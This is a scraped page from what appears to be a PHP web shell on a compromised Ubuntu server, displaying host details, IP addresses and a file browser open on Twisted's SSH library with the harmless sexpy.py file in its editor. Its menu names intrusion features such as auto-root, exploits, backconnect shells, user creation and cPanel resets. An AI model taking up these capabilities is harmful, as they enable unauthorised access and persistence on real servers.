Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.52
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
twisted /
conch /
ssh /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
182
B
-rw-r--r--
_kex.py
8.37
KB
-rw-r--r--
address.py
1.08
KB
-rw-r--r--
agent.py
9.29
KB
-rw-r--r--
channel.py
9.73
KB
-rw-r--r--
common.py
1.91
KB
-rw-r--r--
connection.py
24.94
KB
-rw-r--r--
factory.py
3.74
KB
-rw-r--r--
filetransfer.py
37.2
KB
-rw-r--r--
forwarding.py
8.03
KB
-rw-r--r--
keys.py
64.58
KB
-rw-r--r--
service.py
1.52
KB
-rw-r--r--
session.py
13.41
KB
-rw-r--r--
sexpy.py
944
B
-rw-r--r--
transport.py
78.58
KB
-rw-r--r--
userauth.py
27.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sexpy.py
# Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. def parse(s): s = s.strip() expr = [] while s: if s[0:1] == b"(": newSexp = [] if expr: expr[-1].append(newSexp) expr.append(newSexp) s = s[1:] continue if s[0:1] == b")": aList = expr.pop() s = s[1:] if not expr: assert not s return aList continue i = 0 while s[i : i + 1].isdigit(): i += 1 assert i length = int(s[:i]) data = s[i + 1 : i + 1 + length] expr[-1].append(data) s = s[i + 1 + length :] assert False, "this should not happen" def pack(sexp): return b"".join( b"(%b)" % (pack(o),) if type(o) in (type(()), type([])) else b"%d:%b" % (len(o), o) for o in sexp )
Close